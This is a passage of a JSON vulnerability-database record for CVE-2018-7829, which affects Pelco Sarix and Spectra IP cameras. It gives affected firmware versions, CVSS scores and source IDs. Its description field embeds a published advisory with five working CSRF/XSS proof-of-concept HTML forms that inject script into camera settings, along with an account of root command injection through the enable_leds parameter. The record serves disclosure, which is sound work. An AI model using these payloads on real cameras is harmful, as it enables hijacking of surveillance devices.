"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1vi",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-b1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1vs",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1ep",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1ep",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-b1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1vs",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1vp",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1vi",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1vp",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "d6220",
"scope": "gte",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.11"
},
{
"model": "ime3122-b1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "d6230",
"scope": "gte",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.11"
},
{
"model": "ime119-1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1ep",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "d6230l",
"scope": "gte",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.11"
},
{
"model": "ime3122-1ei",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1vp",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1ei",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1es",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1es",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1vs",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1vs",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1vi",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ixe31",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1vp",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1ei",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-b1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "d6220",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "d6220l",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "d6230",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "d6230l",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "ime119-1i",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "ime119-1p",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "ime119-1s",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "imes19-1i",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "imes19-1p",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "imes19-1s",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "sarix/spectra cameras",
"scope": null,
"trust": 0.6,
"vendor": "pelco",
"version": null
},
{
"model": "electric spectra enhanced model: d6230 2.2.0.5.9340-a0.0",
"scope": "eq",
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "electric sarix model: id10dn 1.8.2.18-20121109-1.9110-o3.8503",
"scope": "eq",
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "electric sarix model: d5230 1.9.2.23-20141118-1.9330-a1.10722",
"scope": "eq",
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "electric sarix enhanced model: ime119 2.1.2.0.8280-a0.0",
"scope": "eq",
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "electric sarix enhanced model: ime219 2.1.2.0.8280-a0.0",
"scope": "eq",
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "electric 1st gen pelco sarix enhanced camera",
"scope": null,
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "electric spectra enhanced ptz camera",
"scope": null,
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "pelco sarix/spectra cameras root remote code execution",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix enhanced - model: ime219 (firmware: 2.1.2.0.8280-a0.0)"
},
{
"model": "pelco sarix/spectra cameras root remote code execution",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix enhanced - model: ime119 (firmware: 2.1.2.0.8280-a0.0)"
},
{
"model": "pelco sarix/spectra cameras root remote code execution",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix - model: d5230 (firmware: 1.9.2.23-20141118-1.9330-a1.10722)"
},
{
"model": "pelco sarix/spectra cameras root remote code execution",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix - model: id10dn (firmware: 1.8.2.18-20121109-1.9110-o3.8503)"
},
{
"model": "pelco sarix/spectra cameras root remote code execution",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "spectra enhanced - model: d6230 (firmware: 2.2.0.5.9340-a0.0)"
},
{
"model": "pelco sarix/spectra cameras multiple xss vulnerabilities",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix enhanced - model: ime219 (firmware: 2.1.2.0.8280-a0.0)"
},
{
"model": "pelco sarix/spectra cameras multiple xss vulnerabilities",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix enhanced - model: ime119 (firmware: 2.1.2.0.8280-a0.0)"
},
{
"model": "pelco sarix/spectra cameras multiple xss vulnerabilities",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix - model: d5230 (firmware: 1.9.2.23-20141118-1.9330-a1.10722)"
},
{
"model": "pelco sarix/spectra cameras multiple xss vulnerabilities",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix - model: id10dn (firmware: 1.8.2.18-20121109-1.9110-o3.8503)"
},
{
"model": "pelco sarix/spectra cameras multiple xss vulnerabilities",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "spectra enhanced - model: d6230 (firmware: 2.2.0.5.9340-a0.0)"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-16263"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015494"
},
{
"db": "NVD",
"id": "CVE-2018-7829"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:schneider_electric:d6220_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:schneider_electric:d6220l_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:schneider_electric:d6230_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:schneider_electric:d6230l_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:schneider_electric:ime119-1i_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:schneider_electric:ime119-1p_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:schneider_electric:ime119-1s_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:schneider_electric:imes19-1i_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:schneider_electric:imes19-1p_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:schneider_electric:imes19-1s_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-015494"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Vulnerability discovered by Gjoko Krstic",
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
}
],
"trust": 0.2
},
"cve": "CVE-2018-7829",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"id": "CVE-2018-7829",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CNVD-2017-23302",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"id": "CNVD-2019-16263",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2018-7829",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2018-7829",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2018-7829",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2017-23302",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2019-16263",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201905-913",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "ZSL",
"id": "ZSL-2017-5417",
"trust": 0.1,
"value": "(4/5)"
},
{
"author": "ZSL",
"id": "ZSL-2017-5415",
"trust": 0.1,
"value": "(3/5)"
}
]
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-16263"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015494"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-913"
},
{
"db": "NVD",
"id": "CVE-2018-7829"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An Improper Neutralization of Special Elements in Query vulnerability exists in the 1st Gen. Pelco Sarix Enhanced Camera and Spectra Enhanced PTZ Camera which allows an attacker to execute arbitrary system commands. Pelco Sarix Enhanced Camera and Spectra Enhanced PTZ Camera Contains a vulnerability in improper neutralization of special elements of data query logic.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. PelcoSarix/SpectraCameras is a camera from Pelco. SchneiderElectric1stGenPelcoSarixEnhancedCamera and SchneiderElectricSpectraEnhancedPTZCamera are products of Schneider Electric. SchneiderElectric1stGenPelcoSarixEnhancedCamera is a series of fixed IP cameras. The Schneider Electric SpectraEnhancedPTZCamera is a series of spherical IP cameras. Security vulnerabilities exist in SchneiderElectric1stGen.PelcoSarixEnhancedCamera and SpectraEnhancedPTZCamera. Pelco offers the broadest selection of IP cameras designedfor security surveillance in a wide variety of commercial and industrialsettings. The POST parameter \u0027enable_leds\u0027 locatedin the update() function called via the GeneralSetupController.phpscript is not properly sanitised before being used in writeLedConfig()function to enable led state to on or off. A remote attacker canexploit this issue and execute arbitrary system commands grantingher system access with root privileges using a specially craftedrequest and escape sequence to system shell.Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknownMontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980)Lighttpd/1.4.28PHP/5.3.0. \nSchneider Electric Pelco Sarix/Spectra Cameras Multiple XSS Vulnerabilities\n\n\nVendor: Schneider Electric SE\nProduct web page: https://www.pelco.com\nAffected version: Sarix Enhanced - Model: IME219 (Firmware: 2.1.2.0.8280-A0.0)\n Sarix Enhanced - Model: IME119 (Firmware: 2.1.2.0.8280-A0.0)\n Sarix - Model: D5230 (Firmware: 1.9.2.23-20141118-1.9330-A1.10722)\n Sarix - Model: ID10DN (Firmware: 1.8.2.18-20121109-1.9110-O3.8503)\n Spectra Enhanced - Model: D6230 (Firmware: 2.2.0.5.9340-A0.0)\n\nSummary: Pelco offers the broadest selection of IP cameras designed\nfor security surveillance in a wide variety of commercial and industrial\nsettings. From our industry-leading fixed and high-speed IP cameras to\npanoramic, thermal imaging, explosionproof and more, we offer a camera\nfor any environment, any lighting condition and any application. \nWhen nothing but the best will do. SarixaC/ Enhanced Range cameras\nprovide the most robust feature-set for your mission-critical applications. \nWith SureVisionaC/ 3.0, Sarix Enhanced delivers the best possible image\nin difficult lighting conditions such as a combination of bright areas,\nshaded areas, and intense light. Designed with superior reliability,\nfault tolerance, and processing speed, these rugged fixed IP cameras\nensure you always get the video that you need. \n\nDesc: Pelco cameras suffer from multiple dom-based, stored and reflected\nXSS vulnerabilities when input passed via several parameters to several\nscripts is not properly sanitized before being returned to the user. \n\nTested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknown\n MontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980)\n Lighttpd/1.4.28\n PHP/5.3.0\n\n\nVulnerability discovered by Gjoko \u0027LiquidWorm\u0027 Krstic\n @zeroscience\n\n\nAdvisory ID: ZSL-2017-5415\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5415.php\n\n\n07.04.2017\n\n--\n\n\nCSRF/XSS on username parameter:\n-------------------------------\n\n\u003chtml\u003e\n \u003cbody\u003e\n \u003cscript\u003ehistory.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027)\u003c/script\u003e\n \u003cform action=\"http://192.168.1.1/setup/network/dot1x/update\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"dot1x\" value=\"on\" /\u003e\n \u003cinput type=\"hidden\" name=\"protocol\" value=\"EAP\u0026#45;TLS\" /\u003e\n \u003cinput type=\"hidden\" name=\"inner\u0026#95;auth\" value=\"CHAP\" /\u003e\n \u003cinput type=\"hidden\" name=\"username\" value=\u0027\"\u003e\u003cscript\u003ealert(1)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"password\" value=\"blah\" /\u003e\n \u003cinput type=\"hidden\" name=\"anonymous\u0026#95;id\" value=\"\u0026#13;\" /\u003e\n \u003cinput type=\"hidden\" name=\"ca\u0026#95;certificate\" value=\"test\" /\u003e\n \u003cinput type=\"hidden\" name=\"client\u0026#95;certificate\" value=\"test\" /\u003e\n \u003cinput type=\"hidden\" name=\"private\u0026#95;key\" value=\"test\" /\u003e\n \u003cinput type=\"hidden\" name=\"private\u0026#95;key\u0026#95;password\" value=\"test\" /\u003e\n \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n \u003c/form\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n\n\nCSRF/XSS on gateway, hostname, ip_address, nameservers, http_port, rtsp_port and subnet_mask parameter:\n-------------------------------------------------------------------------------------------------------\n\n\u003chtml\u003e\n \u003cbody\u003e\n \u003cscript\u003ehistory.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027)\u003c/script\u003e\n \u003cform action=\"http://192.168.1.1/setup/network/general/update\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"hostname\" value=\u0027\"\u003e\u003cscript\u003ealert(2)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"http\u0026#95;port\" value=\u0027\"\u003e\u003cscript\u003ealert(3)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"rtsp\u0026#95;port\" value=\u0027\"\u003e\u003cscript\u003ealert(4)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"dhcp\" value=\"off\" /\u003e\n \u003cinput type=\"hidden\" name=\"ip\u0026#95;address\" value=\u0027\"\u003e\u003cscript\u003ealert(5)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"subnet\u0026#95;mask\" value=\u0027\"\u003e\u003cscript\u003ealert(6)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"gateway\" value=\u0027\"\u003e\u003cscript\u003ealert(7)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"nameservers\" value=\u0027\"\u003e\u003cscript\u003ealert(8)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n \u003c/form\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n\n\nCSRF/XSS on version parameter:\n------------------------------\n\n\u003chtml\u003e\n \u003cbody\u003e\n \u003cscript\u003ehistory.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027)\u003c/script\u003e\n \u003cform action=\"http://192.168.1.1/setup/network/snmp/update\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"version\" value=\u0027\";alert(9)//\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"v2\u0026#95;community\u0026#95;string\" value=\"public\" /\u003e\n \u003cinput type=\"hidden\" name=\"v2\u0026#95;receiver\u0026#95;address\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"v2\u0026#95;trap\u0026#95;community\u0026#95;string\" value=\"trapbratce\" /\u003e\n \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n \u003c/form\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n\n\nCSRF/XSS on device_name, ntp_server, region, smtp_server and zone parameter:\n----------------------------------------------------------------------------\n\n\u003chtml\u003e\n \u003cbody\u003e\n \u003cscript\u003ehistory.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027)\u003c/script\u003e\n \u003cform action=\"http://192.168.1.1/setup/system/general/update\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"device\u0026#95;name\" value=\u0027ZSL\"\u003e\u003cscript\u003ealert(10)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"enable\u0026#95;leds\" value=\"on\" /\u003e\n \u003cinput type=\"hidden\" name=\"smtp\u0026#95;server\" value=\u0027\"\u003e\u003cscript\u003ealert(11)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"ntp\u0026#95;server\u0026#95;from\u0026#95;dhcp\" value=\"false\" /\u003e\n \u003cinput type=\"hidden\" name=\"ntp\u0026#95;server\" value=\"\u0027;alert(12)//\u0027\" /\u003e\n \u003cinput type=\"hidden\" name=\"region\" value=\"Macedonia\u0027;alert(13)//\" /\u003e\n \u003cinput type=\"hidden\" name=\"zone\" value=\"Kumanovo\u0027;alert(14)//\" /\u003e\n \u003cinput type=\"hidden\" name=\"enable\u0026#95;time\u0026#95;overlay\" value=\"on\" /\u003e\n \u003cinput type=\"hidden\" name=\"enable\u0026#95;name\u0026#95;overlay\" value=\"off\" /\u003e\n \u003cinput type=\"hidden\" name=\"position\" value=\"topright\" /\u003e\n \u003cinput type=\"hidden\" name=\"date\u0026#95;format\" value=\"0\" /\u003e\n \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n \u003c/form\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n\n\nXSS on ftp_base_path, ftp_server, ftp_username, ftp_password and name parameter:\n--------------------------------------------------------------------------------\n\n\u003chtml\u003e\n \u003cbody\u003e\n \u003cscript\u003ehistory.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027)\u003c/script\u003e\n \u003cform action=\"http://192.168.1.1/setup/events/handlers/update\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"id\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;sentinel\" value=\"relay\u0026#95;sentinel\" /\u003e\n \u003cinput type=\"hidden\" name=\"name\" value=\u0027\"\u003e\u003cscript\u003ealert(15)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"type\" value=\"Ftp\" /\u003e\n \u003cinput type=\"hidden\" name=\"email\u0026#95;to\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"email\u0026#95;from\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"email\u0026#95;subject\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"email\u0026#95;message\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"dest\u0026#95;name\" value=\"IMG\u0026#37;m\u0026#37;d\u0026#37;Y\u0026#37;H\u0026#37;M\u0026#37;S\u0026#46;jpg\" /\u003e\n \u003cinput type=\"hidden\" name=\"limit\u0026#95;size\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"limit\u0026#95;size\u0026#95;scale\" value=\"K\" /\u003e\n \u003cinput type=\"hidden\" name=\"ftp\u0026#95;server\" value=\u0027\"\u003e\u003cscript\u003ealert(16)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"ftp\u0026#95;username\" value=\u0027\"\u003e\u003cscript\u003ealert(17)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"ftp\u0026#95;password\" value=\u0027\"\u003e\u003cscript\u003ealert(18)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"ftp\u0026#95;base\u0026#95;path\" value=\u0027\"\u003e\u003cscript\u003ealert(19)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"ftp\u0026#95;dest\u0026#95;name\" value=\"IMG\u0026#37;m\u0026#37;d\u0026#37;Y\u0026#37;H\u0026#37;M\u0026#37;S\u0026#46;jpg\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;bankName\" value=\"GPIO\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;index\" value=\"0\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;on\u0026#95;time\" value=\"0\u0026#46;1\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;off\u0026#95;time\" value=\"0\u0026#46;1\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;pulse\u0026#95;count\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"filter\u0026#95;start0\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"filter\u0026#95;stop0\" value=\"\" /\u003e\n \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n \u003c/form\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-7829"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015494"
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-16263"
},
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"db": "PACKETSTORM",
"id": "143313"
}
],
"trust": 2.97
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.zeroscience.mk/codes/pelco_rce.txt",
"trust": 0.1,
"type": "poc"
},
{
"reference": "https://www.zeroscience.mk/codes/pelco_xss.txt",
"trust": 0.1,
"type": "poc"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-7829",
"trust": 3.1
},
{
"db": "SCHNEIDER",
"id": "SEVD-2019-045-03",
"trust": 2.4
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015494",
"trust": 0.8
},
{
"db": "EXPLOIT-DB",
"id": "42307",
"trust": 0.7
},
{
"db": "EXPLOITDB",
"id": "42307",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2017-23302",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2019-16263",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201905-913",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "143313",
"trust": 0.2
},
{
"db": "ZSL",
"id": "ZSL-2017-5415",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "143315",
"trust": 0.1
},
{
"db": "CXSECURITY",
"id": "WLB-2017070080",
"trust": 0.1
},
{
"db": "EXPLOIT-DB",
"id": "42309",
"trust": 0.1
},
{
"db": "ZSL",
"id": "ZSL-2017-5417",
"trust": 0.1
},
{
"db": "NVD",
"id": "CVE-2018-7827",
"trust": 0.1
},
{
"db": "CXSECURITY",
"id": "WLB-2017070075",
"trust": 0.1
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
